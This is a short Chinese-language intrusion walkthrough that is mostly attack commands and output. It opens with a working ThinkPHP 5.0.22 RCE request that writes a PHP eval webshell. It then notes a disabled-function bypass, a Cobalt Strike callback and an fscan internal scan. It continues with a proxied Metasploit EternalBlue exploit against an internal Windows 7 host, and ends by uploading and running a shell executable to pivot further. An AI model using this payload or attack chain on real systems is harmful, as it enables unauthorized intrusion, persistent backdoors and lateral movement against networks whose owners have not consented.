外围突破

thinkphp 5.0.22

GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=bak.php&vars[1][]=%3C%3Fphp+%40eval%28%24_POST%5B%27code%27%5D%29%3B HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Cache-Control: no-cache
Pragma: no-cache
Host: 
Accept: */*
Connection: close

getshell

禁用函数，尝试Bypass

直接CS上线

fscan内网大保健

[+] 10.10.11.191	MS17-010	(Windows 7 Professional 7601 Service Pack 1)
[*] 10.10.11.197  (Windows 10 Pro 10240)

先打永恒之蓝
frp 开一条代理出来

msf6 > setg Proxies socks5:127.0.0.1:6000
Proxies => socks5:127.0.0.1:6000
msf6 > set ReverseAllowProxy true
ReverseAllowProxy => true
msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set  rhost 10.10.11.191
rhost => 10.10.11.191
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

获得交互shell

内网不出网，转发上线

meterpreter > upload ~/shell.exe sys.exe
[*] Uploading  : /root/shell.exe -> sys.exe
[*] Uploaded 289.00 KiB of 289.00 KiB (100.0%): /root/shell.exe -> sys.exe
[*] Completed  : /root/shell.exe -> sys.exe
meterpreter > execute -f "sys.exe"
Process 2700 created.

接着内网大保健